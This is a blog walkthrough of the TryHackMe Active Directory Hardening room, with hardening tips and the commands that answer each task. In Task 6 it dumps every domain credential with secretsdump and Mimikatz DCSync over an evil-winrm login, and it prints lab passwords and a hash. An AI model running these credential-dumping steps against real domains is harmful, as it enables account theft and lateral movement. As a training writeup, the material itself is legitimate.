Active Directory Hardening TryHackMe Walkthrough

Rich
4 min readSep 12, 2023

--

TL;DR TryHackMe is running a promotion for the new Security Engineer pathway! Refer a friend, complete rooms, write one of these walkthroughs, etc for a chance to win stuff! Also, here’s a walkthrough of the AD Hardening room.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

Run, don’t walk, to the new TryHackMe Security Engineer pathway. Complete rooms, refer a friend, do a writeup, let your company know about TryHackMe training, and you, yes you could win some great stuff like a free year of TryHackMe or a laptop.

Here at test.local we had the day off so we immediately knocked out the Active Directory Hardening room in the pathway.

The room is very basic and introductory, but it’s a great start. It seeks to educate regarding basic security hygiene such as

  • Requiring SMB & LDAP signing
  • Requiring password length
  • Least privilege
  • Privilege tiers
  • Compliance with baselines
  • Protecting against common attacks such as Kerberoasting

The room left out a few things that should be done in most Windows domain environments:

  • Disabling LLMNR & NetBIOS
  • Configuring LAPS on any workstation OUs
  • Using the Protected Users group
  • Disabling delegation on privileged user accounts
  • Considering smartcards [they can be expensive, but they’re cheaper than a breach]

The room did however list other TryHackMe rooms that cover much of the above.

Well that’s enough theory, let’s put our hands on the keyboard, connect to the VM, and start finding some answers.

xfreerdp /v:10.10.66.5 /u:Administrator /p:tryhackmewouldnotguess1@ /dynamic-resolution

— Task 2 —

What is the root domain in the attached AD machine?

Get-ADDomain

Or if you want just the answer

(Get-ADDomain).DNSRoot

tryhackme.loc

— Task 3 —

What is the default minimum password length (number of characters) in the attached VM?

Get-ADDefaultDomainPasswordPolicy

Or if you want just the answer

(Get-ADDefaultDomainPasswordPolicy).MinPasswordLength

7

— Task 5 —

Find and open BaselineLocalInstall script in PowerShell editor — Can you find the flag?

Get-Content (Get-ChildItem -Path “C:\Users\Administrator\Desktop\Scripts” -Include “*BaselineLocalInstall*” -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String “THM{“

THM{00001}

Find and open MergePolicyRule script (Policy Analyser) in PowerShell editor — Can you find the flag?

I couldn’t find the “MergePolicyRule.ps1”. I think it was supposed to be “Merge-PolicyRule.ps1”.

Get-Content (Get-ChildItem -Path “C:\Users\Administrator\Desktop\Scripts” -Include “*.ps1” -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String “{*}”

{THM00191}

Alt:

Get-Content (Get-ChildItem -Path “C:\Users\Administrator\Desktop\Scripts” -Include “*.ps1” -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String “Flag :”

— Task 6 —

As per the generated report, how many users have the same password as aaron.booth?

Initially I just ran secretsdump from Kali since after all we already have a Domain Admin login.

cd /home/kali/Downloads/impacket-master/examples

python3 secretsdump.py -just-dc-ntlm za/Administrator@10.10.66.5

However this is not a good way to get a count of matching NTLM hashes. Therefore I copied Invoke-Mimikatz.ps1 to the VM and ran it there. This can be done via evil-winrm. (Our Mimikatz cheatsheet is here if you are not familiar with it.)

evil-winrm -i 10.10.66.3 -u Administrator -p tryhackmewouldnotguess1@

upload /home/kali/Downloads/exploits/PowerShell/Invoke-Mimikatz.ps1

Or one can just copy/paste it over RDP.

Dump all the hashes to a file.

Invoke-Mimikatz -Command ‘“lsadump::dcsync /domain:za.tryhackme.loc /all”’ | Out-File .\AllCreds.txt

Find aaron.booth’s NTLM.

Get-Content .\AllCreds.txt | Select-String aaron.booth -Context 5

copy/paste aaron.booth’s hash and get a count of total matches.

(Get-Content .\AllCreds.txt | Select-String “64f12cddaa88057e06a81b54e73b949b”).Count

Just stubtract 1 since aaron.booth is one of the matches.

186

By the way, there were 5,046 AD users on the VM, so running quick queries like the above is a good, workable way to get a count quickly and easily.

In case anyone else is curious, aaron.booth’s plaintest password is Password1.

Summary

I’m always happy to see TryHackMe roll out a new pathway. This one looks promising and a good way to keep getting hand on practice and learn.

References

NTLM: https://learn.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm

Dumping all domain hashes with Mimikatz: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

--

--

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.